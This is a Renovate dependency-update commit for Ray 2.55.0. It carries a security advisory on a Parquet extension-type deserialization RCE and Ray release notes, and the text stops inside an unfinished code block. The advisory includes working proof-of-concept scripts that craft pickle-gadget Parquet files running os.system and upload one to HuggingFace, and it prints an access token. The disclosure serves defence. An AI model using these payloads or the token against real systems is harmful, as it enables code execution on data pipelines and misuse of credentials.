Commit 69b3fc6
Update dependency ray to v2.55.0 [SECURITY] - abandoned (#7629)
> ℹ️ **Note**
>
> This PR body was truncated due to platform limits.
This PR contains the following updates:
| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [ray](https://redirect.github.com/ray-project/ray) | `2.54.0` → `2.55.0` | | |
---
> [!WARNING]
> Some dependencies could not be looked up. Check the [Dependency
Dashboard](../issues/357) for more information.
---
### Ray: Remote Code Execution via Parquet Arrow Extension Type Deserialization
[CVE-2026-41486](https://nvd.nist.gov/vuln/detail/CVE-2026-41486) /
[GHSA-mw35-8rx3-xf9r](https://redirect.github.com/advisories/GHSA-mw35-8rx3-xf9r)
<details>
<summary>More information</summary>
#### Details
##### Remote Code Execution via Parquet Arrow Extension Type Deserialization
##### Summary
Ray Data registers custom Arrow extension types
(`ray.data.arrow_tensor`, `ray.data.arrow_tensor_v2`,
`ray.data.arrow_variable_shaped_tensor`) globally in PyArrow. When
PyArrow reads a Parquet file containing one of these extension types, it
calls `__arrow_ext_deserialize__` on the field's metadata bytes. Ray's
implementation passes these bytes directly to `cloudpickle.loads()`,
achieving arbitrary code execution during schema parsing, before any row
data is read.
In May 2024, Ray fixed a related vulnerability in
`PyExtensionType`-based extension types ([issue
#​41314](https://redirect.github.com/ray-project/ray/issues/41314),
[PR
#​45084](https://redirect.github.com/ray-project/ray/pull/45084)).
In July 2025, [PR
#​54831](https://redirect.github.com/ray-project/ray/pull/54831)
introduced `cloudpickle.loads()` into the replacement extension types'
deserialization path, reintroducing the same class of vulnerability.
Note: Source links in this report are pinned to the Ray 2.54.0 release
commit (`48bd1f8fa4`) for stable line references. We also re-verified
the same vulnerable code paths on current `master` as of March 17, 2026.
##### Details
##### Extension type registration
Ray Data registers three Arrow extension types globally in PyArrow:
```python
# python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605
pa.register_extension_type(ArrowTensorType((0,), pa.int64()))
pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64()))
pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0))
```
Registration happens at module load time
([`__init__.py:94-95`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/__init__.py#L94-L95)),
and any use of `ray.data` triggers it. Once registered, PyArrow
automatically calls `__arrow_ext_deserialize__` whenever it encounters
these extension type names in any Parquet file's schema, including files
from untrusted sources.
##### The code path to `cloudpickle.loads()`
All three extension types inherit from
`ArrowExtensionSerializeDeserializeCache`, whose
`__arrow_ext_deserialize__` method
([`arrow.py:176-179`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L176-L179))
delegates to subclass methods that ultimately call
`_deserialize_with_fallback()`:
```python
# python/ray/data/_internal/tensor_extensions/arrow.py:84-96
def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"):
    """Deserialize data with cloudpickle first, fallback to JSON."""
    try:
        # Try cloudpickle first (new format)
        return cloudpickle.loads(serialized)  # <-- arbitrary code execution
    except Exception:
        # Fallback to JSON format (legacy)
        try:
            return json.loads(serialized)
        except json.JSONDecodeError:
            raise ValueError(
                f"Unable to deserialize {field_name} from {type(serialized)}"
            )
```
The `serialized` bytes come directly from the Parquet file's field-level
metadata (`ARROW:extension:metadata`) with no validation.
`cloudpickle.loads()` is tried **first**, meaning a crafted payload will
always be executed before the safe JSON fallback is reached.
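Why the ordering matters can be sketched with stdlib `pickle` (cloudpickle builds on the same protocol, so the gadget mechanics are identical); the harmless `print` side effect below stands in for the `os.system()` gadget of a real payload:

```python
# Sketch with stdlib pickle: bytes built from an object with a custom
# __reduce__ execute code at loads() time. A cloudpickle payload behaves
# the same way in Ray's cloudpickle-first fallback.
import json
import pickle


class Trigger:
    def __reduce__(self):
        # Harmless stand-in for the os.system() gadget.
        return (print, ("code executed during loads()",))


payload = pickle.dumps(Trigger())

# Ray's ordering: try pickle first, JSON only on failure. A crafted
# payload deserializes without raising, so the "safe" JSON branch is
# never reached.
reached_json = False
try:
    result = pickle.loads(payload)  # prints: code executed during loads()
except Exception:
    reached_json = True
    result = json.loads(payload)

print(reached_json)  # False -- the fallback never ran
```

Swapping the order would not help either: the pickle branch must be removed entirely, since the attacker chooses whether the bytes are valid pickle.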
For `ArrowTensorType`, the call chain is:
```
__arrow_ext_deserialize__(cls, storage_type, serialized) # arrow.py:176
-> _arrow_ext_deserialize_cache(serialized, value_type) # arrow.py:178
-> _arrow_ext_deserialize_compute(serialized, value_type) # arrow.py:652
-> _deserialize_with_fallback(serialized, "shape") # arrow.py:653
-> cloudpickle.loads(serialized) # arrow.py:88 RCE
```
`ArrowTensorTypeV2`
([`arrow.py:679-680`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L679-L680))
and `ArrowVariableShapedTensorType`
([`arrow.py:1076-1077`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L1076-L1077))
follow the same pattern.
##### Why the existing mitigation doesn't help
After issue
[#​41314](https://redirect.github.com/ray-project/ray/issues/41314),
Ray added `check_for_legacy_tensor_type()` in
[`parquet_datasource.py:146-170`](https://redirect.github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/datasource/parquet_datasource.py#L146-L170)
to block the old `PyExtensionType`-based tensor types:
```python
# python/ray/data/_internal/datasource/parquet_datasource.py:146-170
def check_for_legacy_tensor_type(schema):
    """Check for the legacy tensor extension type and raise an error if found.

    Ray Data uses an extension type to represent tensors in Arrow tables. Previously,
    the extension type extended `PyExtensionType`. However, this base type can expose
    users to arbitrary code execution. To prevent this, we don't load the type by
    default.
    """
    for name, type in zip(schema.names, schema.types):
        if isinstance(type, pa.UnknownExtensionType) and isinstance(
            type, pa.PyExtensionType
        ):
            raise RuntimeError(...)
```
This guard checks for `PyExtensionType` / `UnknownExtensionType`. It
does **not** check for the currently-registered `ray.data.arrow_tensor`
types, which are the ones that call `cloudpickle.loads()`. Additionally,
the check runs after PyArrow has already deserialized the schema, so
even if it checked for the current types, the code execution would have
already occurred.
##### Outside Ray's documented threat model
Ray's [security
documentation](https://docs.ray.io/en/latest/ray-security/index.html)
states that Ray relies on network isolation and "extensively uses
cloudpickle." This vulnerability does not require cluster access. The
payload arrives through a Parquet file from cloud storage, a data lake,
HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster
is vulnerable if it reads a crafted file.
##### Impact
- **Affected versions**: Ray 2.49.0 through 2.54.0 (latest release as of
March 2026). The vulnerable `_deserialize_with_fallback` function with
`cloudpickle.loads()` was introduced in commit `f6d21db1a4` ([PR
#​54831](https://redirect.github.com/ray-project/ray/pull/54831),
July 2025), first released in Ray 2.49.0.
- **Affected configurations**: Any process that uses Ray Data and reads
Parquet files. The extension types are registered globally in PyArrow,
so all Parquet reads in the process are affected, including
`ray.data.read_parquet()`, `pyarrow.parquet.read_table()`,
`pandas.read_parquet()`, etc.
- **Attacker prerequisites**: The attacker must place a crafted Parquet
file where a Ray Data pipeline reads it. No authentication or cluster
access is required. The Parquet file must contain a column with a
`ray.data.arrow_tensor` (or v2, or variable-shaped) extension type name,
which makes this a targeted attack against Ray Data users.
- **CIA impact**: Arbitrary command execution as the Ray worker process
user, resulting in full server compromise.
- **Severity**: Critical
##### Attack scenarios
1. **HuggingFace datasets**: Ray's documentation
[recommends](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face)
reading Parquet datasets from HuggingFace using
`ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem())`.
Anyone can create a HuggingFace dataset containing a crafted Parquet
file. A tensor column with `ray.data.arrow_tensor` metadata is normal
for an ML dataset, as tensor columns are a core Ray Data feature. We
verified this scenario end-to-end with a private HuggingFace dataset
(see PoC below).
2. **Multi-tenant ML platforms**: Organizations running shared Ray
clusters where multiple teams submit data processing jobs. If one team
can write Parquet files to shared storage that another team reads, the
writer can execute arbitrary code in the reader's context.
3. **Compromised data pipelines**: An upstream data producer writes
Parquet files with crafted tensor column metadata. The payload survives
because standard Parquet tools preserve extension metadata
transparently.
##### PoC
We provide two reproductions: a minimal local PoC and a full end-to-end
scenario via HuggingFace.
**Prerequisites:** Python 3.12+ and
[uv](https://docs.astral.sh/uv/getting-started/installation/) (`curl
-LsSf https://astral.sh/uv/install.sh | sh`).
##### PoC 1: Local file
Creates a valid Parquet file with a tensor column whose extension
metadata contains a crafted cloudpickle payload. Reading the file with
Ray Data triggers code execution during schema parsing.
**1. Create the Parquet file:**
```bash
cat > craft_parquet.py << 'SCRIPT'
import cloudpickle
import pyarrow as pa
import pyarrow.parquet as pq

COMMAND = "id > /tmp/ray-tensor-rce-proof"

class Trigger:
    def __reduce__(self):
        return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",))

storage_type = pa.list_(pa.int64())
schema = pa.schema([
    pa.field("tensor", storage_type, metadata={
        b"ARROW:extension:name": b"ray.data.arrow_tensor",
        b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
    }),
    pa.field("id", pa.int64()),
    pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
    pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
    pa.array([1, 2]),
    pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, "crafted.parquet")
print("Created crafted.parquet")
SCRIPT
uv run --with 'cloudpickle,pyarrow' python craft_parquet.py
```
**2. Read it with Ray Data:**
```bash
rm -f /tmp/ray-tensor-rce-proof
uv run --with 'ray[data]' python -c "
import ray.data
ray.data.read_parquet('crafted.parquet')
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' — confirms code execution
```
##### PoC 2: End-to-end via HuggingFace
This demonstrates the realistic attack scenario: a crafted Parquet file
hosted as a HuggingFace dataset, read by a Ray cluster following [Ray's
own
documentation](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face).
We uploaded a crafted Parquet file to a private HuggingFace dataset at
[`antiproof/parquet-tensor-disclosure`](https://huggingface.co/datasets/antiproof/parquet-tensor-disclosure).
The file looks like a normal ML dataset with tensor, id, and text
columns. The read-only token below gives access.
**Upload script** (for reference, this is how we seeded the dataset):
```bash
cat > upload_dataset.py << 'SCRIPT'
# /// script
# requires-python = ">=3.10"
# dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"]
# ///
"""Upload a crafted Parquet file to a HuggingFace dataset.

Prerequisites: huggingface-cli login (with a write token)
Usage: uv run upload_dataset.py <repo_id> <command>
"""
import sys, tempfile
from pathlib import Path

import cloudpickle, pyarrow as pa, pyarrow.parquet as pq
from huggingface_hub import HfApi

def build_parquet(output, command):
    class Trigger:
        def __reduce__(self):
            return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",))

    storage_type = pa.list_(pa.int64())
    schema = pa.schema([
        pa.field("tensor", storage_type, metadata={
            b"ARROW:extension:name": b"ray.data.arrow_tensor",
            b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
        }),
        pa.field("id", pa.int64()),
        pa.field("text", pa.string()),
    ])
    table = pa.Table.from_arrays([
        pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
        pa.array([1, 2]),
        pa.array(["hello", "world"]),
    ], schema=schema)
    pq.write_table(table, str(output))

repo_id, command = sys.argv[1], sys.argv[2]
with tempfile.TemporaryDirectory() as tmpdir:
    parquet = Path(tmpdir) / "train.parquet"
    build_parquet(parquet, command)
    HfApi().upload_file(
        path_or_fileobj=str(parquet),
        path_in_repo="data/train.parquet",
        repo_id=repo_id, repo_type="dataset",
    )
    print(f"Uploaded to https://huggingface.co/datasets/{repo_id}")
SCRIPT
# We ran:
# uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof'
```
**Reproduce** (reads the dataset from HuggingFace, no local files
needed):
```bash
rm -f /tmp/ray-tensor-rce-proof
HF_TOKEN=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 \
uv run --with 'ray[data],huggingface_hub' python -c "
import ray.data
from huggingface_hub import HfFileSystem
ray.data.read_parquet(
'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet',
filesystem=HfFileSystem(),
)
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' — confirms code execution via HuggingFace dataset
```
The token above is read-only. The dataset is private to prevent
unintended exposure.
##### Suggested fix
The extension metadata stores simple values (a shape tuple like `(3,
224, 224)` or an ndim integer). These do not require cloudpickle.
1. **Replace `cloudpickle.loads()` in `_deserialize_with_fallback()`
with `json.loads()`.** The tensor shape and ndim are JSON-serializable.
For backward compatibility with files written using the current
cloudpickle format, gate `cloudpickle.loads()` behind an opt-in
environment variable (following the pattern already established with
`RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE`).
2. **Serialize new extension type metadata as JSON by default.**
`json.dumps([3, 224, 224])` carries the same information as
`cloudpickle.dumps((3, 224, 224))`, without the code execution risk.
3. **Add a security note to `read_parquet()` documentation** explaining
that Parquet files from untrusted sources can execute arbitrary code
when tensor extension types are registered.
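A minimal sketch of fixes (1) and (2) together, with hypothetical helper names (Ray's actual patch may be structured differently):

```python
# Sketch of the suggested JSON-only metadata codec. Function names are
# hypothetical; the point is that attacker-controlled metadata bytes are
# parsed strictly as data and never unpickled.
import json


def serialize_metadata(value) -> bytes:
    # Shape tuples and ndim integers are plain JSON -- no pickling needed.
    return json.dumps(list(value) if isinstance(value, tuple) else value).encode()


def deserialize_metadata(serialized: bytes, field_name: str = "data"):
    try:
        return json.loads(serialized)
    except (json.JSONDecodeError, UnicodeDecodeError):
        raise ValueError(f"Unable to deserialize {field_name} as JSON")


# A shape tuple round-trips losslessly, with no code-execution surface.
shape = deserialize_metadata(serialize_metadata((3, 224, 224)), "shape")
print(shape)  # [3, 224, 224]
```

Files written with the current cloudpickle format would fail this parse and could then be handled by the proposed opt-in environment variable.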
Please contact security@antiproof.ai with any questions about this
disclosure policy or related security research.
#### Severity
- CVSS Score: 8.9 / 10 (High)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H`
#### References
- [https://github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r](https://redirect.github.com/ray-project/ray/security/advisories/GHSA-mw35-8rx3-xf9r)
- [https://github.com/advisories/GHSA-mw35-8rx3-xf9r](https://redirect.github.com/advisories/GHSA-mw35-8rx3-xf9r)
This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-mw35-8rx3-xf9r)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>
---
### Release Notes
<details>
<summary>ray-project/ray (ray)</summary>
### [`v2.55.0`](https://redirect.github.com/ray-project/ray/releases/tag/ray-2.55.0)

[Compare Source](https://redirect.github.com/ray-project/ray/compare/ray-2.54.1...ray-2.55.0)
#### Ray Data
##### 🎉 New Features
- Add `DataSourceV2` API with scanner/reader framework, file listing,
and file partitioning
([#​61220](https://redirect.github.com/ray-project/ray/issues/61220),
[#​61615](https://redirect.github.com/ray-project/ray/issues/61615),
[#​61997](https://redirect.github.com/ray-project/ray/issues/61997))
- Support GPU shuffle with `rapidsmpf` 26.2
([#​61371](https://redirect.github.com/ray-project/ray/issues/61371),
[#​62062](https://redirect.github.com/ray-project/ray/issues/62062))
- Add Kafka datasink, migrate to `confluent-kafka`, support `datetime`
offsets
([#​60307](https://redirect.github.com/ray-project/ray/issues/60307),
[#​61284](https://redirect.github.com/ray-project/ray/issues/61284),
[#​60909](https://redirect.github.com/ray-project/ray/issues/60909))
- Add Turbopuffer datasink
([#​58910](https://redirect.github.com/ray-project/ray/issues/58910))
- Add 2-phase commit checkpointing with trie recovery and load method
([#​61821](https://redirect.github.com/ray-project/ray/issues/61821),
[#​60951](https://redirect.github.com/ray-project/ray/issues/60951))
- Queue-based autoscaling policy integrated with task consumers
([#​59548](https://redirect.github.com/ray-project/ray/issues/59548),
[#​60851](https://redirect.github.com/ray-project/ray/issues/60851))
- Enable autoscaling for GPU stages
([#​61130](https://redirect.github.com/ray-project/ray/issues/61130))
- Expressions: add `random()`, `uuid()`, `cast`, and map namespace
support
([#​59656](https://redirect.github.com/ray-project/ray/issues/59656),
[#​60695](https://redirect.github.com/ray-project/ray/issues/60695),
[#​59879](https://redirect.github.com/ray-project/ray/issues/59879))
- Add support for Arrow native fixed-shape tensor type
([#​56284](https://redirect.github.com/ray-project/ray/issues/56284))
- Support writing tensors to tfrecords
([#​60859](https://redirect.github.com/ray-project/ray/issues/60859))
- Add `pathlib.Path` support to `read_*` functions
([#​61126](https://redirect.github.com/ray-project/ray/issues/61126))
- Add `cudf` as a `batch_format`
([#​61329](https://redirect.github.com/ray-project/ray/issues/61329))
- Allow `ActorPoolStrategy` for `read_datasource()` via `compute`
parameter
([#​59633](https://redirect.github.com/ray-project/ray/issues/59633))
- Introduce `ExecutionCache` for streamlined caching
([#​60996](https://redirect.github.com/ray-project/ray/issues/60996))
- Support `strict=False` mode for `StreamingRepartition`
([#​60295](https://redirect.github.com/ray-project/ray/issues/60295))
- Port changes from lance-ray into Ray Data
([#​60497](https://redirect.github.com/ray-project/ray/issues/60497))
- Enable PyArrow compute-to-expression conversion for predicate pushdown
([#​61617](https://redirect.github.com/ray-project/ray/issues/61617))
- Add vLLM metrics export and Data LLM Grafana dashboard
([#​60385](https://redirect.github.com/ray-project/ray/issues/60385))
- Include logical memory in resource manager scheduling decisions
([#​60774](https://redirect.github.com/ray-project/ray/issues/60774))
- Add monotonically increasing ID support
([#​59290](https://redirect.github.com/ray-project/ray/issues/59290))
##### 💫 Enhancements
- Performance: cache `_map_task` args, heap-based actor ranking, actor
pool map improvements
([#​61996](https://redirect.github.com/ray-project/ray/issues/61996),
[#​62114](https://redirect.github.com/ray-project/ray/issues/62114),
[#​61591](https://redirect.github.com/ray-project/ray/issues/61591))
- Optimize concat tables and PyArrow schema hashing
([#​61315](https://redirect.github.com/ray-project/ray/issues/61315),
[#​62108](https://redirect.github.com/ray-project/ray/issues/62108))
- Reduce default `DownstreamCapacityBackpressurePolicy` threshold to 50%
([#​61890](https://redirect.github.com/ray-project/ray/issues/61890))
- Improve reproducibility for random APIs
([#​59662](https://redirect.github.com/ray-project/ray/issues/59662))
- Clamp batch size to fall within C++ 32-bit int range
([#​62242](https://redirect.github.com/ray-project/ray/issues/62242))
- Account for external consumer object store usage in resource manager
budget
([#​62117](https://redirect.github.com/ray-project/ray/issues/62117))
- Make `get_parquet_dataset` configurable in number of fragments to scan
([#​61670](https://redirect.github.com/ray-project/ray/issues/61670))
- Consolidate schema inference and make all preprocessors implement
`SerializablePreprocessorBase`
([#​61213](https://redirect.github.com/ray-project/ray/issues/61213),
[#​61341](https://redirect.github.com/ray-project/ray/issues/61341))
- Disable hanging issue detection by default
([#​62405](https://redirect.github.com/ray-project/ray/issues/62405))
- Make execution callback dataflow explicit to prevent state leakage
([#​61405](https://redirect.github.com/ray-project/ray/issues/61405))
- Log `DataContext` in JSON format at execution start for traceability
([#​61150](https://redirect.github.com/ray-project/ray/issues/61150),
[#​61428](https://redirect.github.com/ray-project/ray/issues/61428))
- Autoscaler: configurable traceback, Prometheus gauges, relaxed
constraints
([#​62210](https://redirect.github.com/ray-project/ray/issues/62210),
[#​62209](https://redirect.github.com/ray-project/ray/issues/62209),
[#​61917](https://redirect.github.com/ray-project/ray/issues/61917),
[#​61385](https://redirect.github.com/ray-project/ray/issues/61385))
- Add metrics for task scheduling time, output backpressure, and logical
memory
([#​61192](https://redirect.github.com/ray-project/ray/issues/61192),
[#​61007](https://redirect.github.com/ray-project/ray/issues/61007),
[#​61436](https://redirect.github.com/ray-project/ray/issues/61436))
- Prevent operators from dominating entire shared object store budget
([#​61605](https://redirect.github.com/ray-project/ray/issues/61605))
- Eliminate generators to avoid intermediate state pinning
([#​60598](https://redirect.github.com/ray-project/ray/issues/60598))
- Default log encoding to UTF-8 on Windows
([#​61143](https://redirect.github.com/ray-project/ray/issues/61143))
- Remove legacy `BlockList`, `locality_with_output`, old callback API,
PyArrow 9.0 checks
([#​60575](https://redirect.github.com/ray-project/ray/issues/60575),
[#​61044](https://redirect.github.com/ray-project/ray/issues/61044),
[#​62055](https://redirect.github.com/ray-project/ray/issues/62055),
[#​61483](https://redirect.github.com/ray-project/ray/issues/61483))
- Upgrade to `pyiceberg` 0.11.0; cap `pandas` to <3
([#​61062](https://redirect.github.com/ray-project/ray/issues/61062),
[#​60406](https://redirect.github.com/ray-project/ray/issues/60406))
- Refactor logical operators to frozen dataclasses
([#​61059](https://redirect.github.com/ray-project/ray/issues/61059),
[#​61308](https://redirect.github.com/ray-project/ray/issues/61308),
[#​61348](https://redirect.github.com/ray-project/ray/issues/61348),
[#​61349](https://redirect.github.com/ray-project/ray/issues/61349),
[#​61351](https://redirect.github.com/ray-project/ray/issues/61351),
[#​61364](https://redirect.github.com/ray-project/ray/issues/61364),
[#​61481](https://redirect.github.com/ray-project/ray/issues/61481))
- Prevent aggregator head node scheduling
([#​61288](https://redirect.github.com/ray-project/ray/issues/61288))
- Add error for `local://` paths with a zero-resource head node
([#​60709](https://redirect.github.com/ray-project/ray/issues/60709))
##### 🔨 Fixes
- Fix RCE in Arrow extension type deserialization from Parquet
([#​62056](https://redirect.github.com/ray-project/ray/issues/62056))
- Fix `StreamingSplitDataIterator.schema()`
([#​62057](https://redirect.github.com/ray-project/ray/issues/62057))
- Fix `ParquetDatasource` handling of `FileSystemFactory.inspect`
([#​62065](https://redirect.github.com/ray-project/ray/issues/62065))
- Fix `read_parquet` file-extension filtering for versioned object-store
URIs
([#​61376](https://redirect.github.com/ray-project/ray/issues/61376))
- Fix `wide_schema_pipeline_tensors` cloudpickle deserialization
([#​62149](https://redirect.github.com/ray-project/ray/issues/62149))
- Fix `OpBufferQueue` race condition
([#​60828](https://redirect.github.com/ray-project/ray/issues/60828))
- Fix scheduling metrics computation
([#​62031](https://redirect.github.com/ray-project/ray/issues/62031))
- Fix `OneHotEncoder` `max_categories` to use global top-k instead of
per-partition
([#​60790](https://redirect.github.com/ray-project/ray/issues/60790))
- Fix `ReservationOpResourceAllocator` resource borrowing for
`ActorPoolMapOperator`
([#​60882](https://redirect.github.com/ray-project/ray/issues/60882))
- Fix `DatabricksUCDatasource` `schema()` shadowing by schema string
attribute
([#​61282](https://redirect.github.com/ray-project/ray/issues/61282))
- Fix `AliasExpr` structural equality to respect rename flag
([#​60711](https://redirect.github.com/ray-project/ray/issues/60711))
- Fix `_align_struct_fields` failure with unaligned scalar fields
([#​58364](https://redirect.github.com/ray-project/ray/issues/58364))
- Fix `min_scheduling_resources` fallback to
`incremental_resource_usage`
([#​60997](https://redirect.github.com/ray-project/ray/issues/60997))
- Fix output backpressure unblocking sequence for terminal ops
([#​60798](https://redirect.github.com/ray-project/ray/issues/60798))
- Fix multi-input operator object store memory attribution
([#​61208](https://redirect.github.com/ray-project/ray/issues/61208))
- Fix reference cycle by moving to module scope
([#​61934](https://redirect.github.com/ray-project/ray/issues/61934))
- Fix autoscaler logging: reduce verbose output and move traceback to
debug
([#​61989](https://redirect.github.com/ray-project/ray/issues/61989),
[#​62126](https://redirect.github.com/ray-project/ray/issues/62126))
- Fix double counting `ref_bundle` + `input_files`
([#​61774](https://redirect.github.com/ray-project/ray/issues/61774))
- Replace `on_exit` hook with `__ray_shutdown__` to fix UDF cleanup race
([#​61700](https://redirect.github.com/ray-project/ray/issues/61700))
- Prevent `Limit` from getting pushed past `map_groups`
([#​60881](https://redirect.github.com/ray-project/ray/issues/60881))
- Propagate schema in empty `_shuffle_block` to fix `ColumnNotFound` in
chained left joins
([#​61507](https://redirect.github.com/ray-project/ray/issues/61507))
- Fix unclear metadata warning and incorrect operator name logging
([#​61380](https://redirect.github.com/ray-project/ray/issues/61380))
- Clamp rolling utilization averages to zero
([#​61543](https://redirect.github.com/ray-project/ray/issues/61543))
- Fix floating point errors in `TimeWindowAverageCalculator`
([#​61580](https://redirect.github.com/ray-project/ray/issues/61580))
- Remove default task-level timeout and clamp `end_offset` in Kafka
datasource
([#​61476](https://redirect.github.com/ray-project/ray/issues/61476))
- Avoid redundant reads in `train_test_split`
([#​60274](https://redirect.github.com/ray-project/ray/issues/60274))
- Return `None` when no outputs have been produced
([#​62029](https://redirect.github.com/ray-project/ray/issues/62029))
- Replace bare `raise` with `TypeError` in string concatenation
([#​60795](https://redirect.github.com/ray-project/ray/issues/60795))
##### 📖 Documentation
- Add job-level checkpointing documentation
([#​60921](https://redirect.github.com/ray-project/ray/issues/60921))
- Update `exclude_resources` docs for Train autoscaling changes
([#​61990](https://redirect.github.com/ray-project/ray/issues/61990))
- Add `locality_with_output` migration instructions
([#​61151](https://redirect.github.com/ray-project/ray/issues/61151))
- Document `max_tasks_in_flight_per_actor` vs `max_concurrent_batches`
([#​60477](https://redirect.github.com/ray-project/ray/issues/60477))
- Add missing `MOD` operation docs; improve `ray.data.Datasource` docs
([#​60803](https://redirect.github.com/ray-project/ray/issues/60803),
[#​59654](https://redirect.github.com/ray-project/ray/issues/59654))
- Add `polars` usage instructions
([#​60029](https://redirect.github.com/ray-project/ray/issues/60029))
#### Ray Serve
##### 🎉 New Features:
- Added end-to-end gRPC client and bidirectional streaming support,
including public APIs, proxy handling, proto updates, and developer
docs, so Serve apps can handle streaming workloads natively instead of
building custom transport layers.
([#​60767](https://redirect.github.com/ray-project/ray/issues/60767),
[#​60768](https://redirect.github.com/ray-project/ray/issues/60768),
[#​60769](https://redirect.github.com/ray-project/ray/issues/60769),
[#​60770](https://redirect.github.com/ray-project/ray/issues/60770),
[#​60771](https://redirect.github.com/ray-project/ray/issues/60771))
- Introduced HAProxy-based serving with fallback proxy support and
load-balancer tunables, giving operators a higher-throughput ingress
path and more control over traffic behavior in production.
([#​60586](https://redirect.github.com/ray-project/ray/issues/60586),
[#​61180](https://redirect.github.com/ray-project/ray/issues/61180),
[#​61271](https://redirect.github.com/ray-project/ray/issues/61271),
[#​61468](https://redirect.github.com/ray-project/ray/issues/61468),
[#​61988](https://redirect.github.com/ray-project/ray/issues/61988))
- Added queue-based autoscaling for async inference and Taskiq-backed
workloads, so scaling decisions can account for both HTTP in-flight load
and queued tasks.
([#​59548](https://redirect.github.com/ray-project/ray/issues/59548),
[#​60851](https://redirect.github.com/ray-project/ray/issues/60851),
[#​60977](https://redirect.github.com/ray-project/ray/issues/60977),
[#​61008](https://redirect.github.com/ray-project/ray/issues/61008))
- Rolled out gang scheduling support across validation, core scheduling,
fault tolerance, downscaling, autoscaling, rolling updates, and
migration, enabling coordinated multi-replica placement for tightly
coupled workloads.
([#​60944](https://redirect.github.com/ray-project/ray/issues/60944),
[#​61205](https://redirect.github.com/ray-project/ray/issues/61205),
[#​61206](https://redirect.github.com/ray-project/ray/issues/61206),
[#​61207](https://redirect.github.com/ray-project/ray/issues/61207),
[#​61215](https://redirect.github.com/ray-project/ray/issues/61215),
[#​61467](https://redirect.github.com/ray-project/ray/issues/61467),
[#​61216](https://redirect.github.com/ray-project/ray/issues/61216),
[#​61659](https://redirect.github.com/ray-project/ray/issues/61659))
- Introduced deployment-scoped actors with config/schema, lifecycle
management, public API, and controller health checks, making it easier
to run durable per-deployment sidecar-like logic inside Serve.
([#​61639](https://redirect.github.com/ray-project/ray/issues/61639),
[#​61648](https://redirect.github.com/ray-project/ray/issues/61648),
[#​61664](https://redirect.github.com/ray-project/ray/issues/61664),
[#​61833](https://redirect.github.com/ray-project/ray/issues/61833),
[#​62161](https://redirect.github.com/ray-project/ray/issues/62161))
##### 💫 Enhancements:
- Added first-class tracing support for Serve, including
inter-deployment gRPC propagation and richer streaming-path attributes,
improving end-to-end observability across distributed request flows.
([#​61230](https://redirect.github.com/ray-project/ray/issues/61230),
[#​61089](https://redirect.github.com/ray-project/ray/issues/61089),
[#​61451](https://redirect.github.com/ray-project/ray/issues/61451))
- Expanded operational metrics with replica utilization, richer error
labeling, and client IP logging in access logs, helping teams diagnose
bottlenecks and user-impacting issues faster.
([#​60758](https://redirect.github.com/ray-project/ray/issues/60758),
[#​61092](https://redirect.github.com/ray-project/ray/issues/61092),
[#​60967](https://redirect.github.com/ray-project/ray/issues/60967))
- Improved autoscaling extensibility with class-based policies and
`policy_kwargs`, so advanced users can package reusable autoscaling
logic without custom forks.
([#​60964](https://redirect.github.com/ray-project/ray/issues/60964))
- Reduced controller overhead with broad algorithmic improvements
(indexing, cache reuse, and avoiding repeated per-tick work), which
improves scalability as deployment and replica counts grow.
([#​60810](https://redirect.github.com/ray-project/ray/issues/60810),
[#​60829](https://redirect.github.com/ray-project/ray/issues/60829),
[#​60830](https://redirect.github.com/ray-project/ray/issues/60830),
[#​60838](https://redirect.github.com/ray-project/ray/issues/60838),
[#​60842](https://redirect.github.com/ray-project/ray/issues/60842),
[#​60843](https://redirect.github.com/ray-project/ray/issues/60843),
[#​60844](https://redirect.github.com/ray-project/ray/issues/60844),
[#​60832](https://redirect.github.com/ray-project/ray/issues/60832),
[#​60806](https://redirect.github.com/ray-project/ray/issues/60806))
- Improved throughput-oriented operation controls by adding
environment-based tuning and explicit throughput optimization logging,
making performance behavior easier to configure and audit.
([#​60757](https://redirect.github.com/ray-project/ray/issues/60757),
[#​62146](https://redirect.github.com/ray-project/ray/issues/62146))
- Upgraded Serve internals to Pydantic v2 and refined time-series
aggregation behavior for more predictable metric accuracy under high
load.
([#​61061](https://redirect.github.com/ray-project/ray/issues/61061),
[#​61403](https://redirect.github.com/ray-project/ray/issues/61403))
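The class-based autoscaling item above can be sketched in plain Python. Everything here is hypothetical — the class name, constructor parameters, and `decide` signature are illustrative assumptions, not Ray Serve's actual policy interface:

```python
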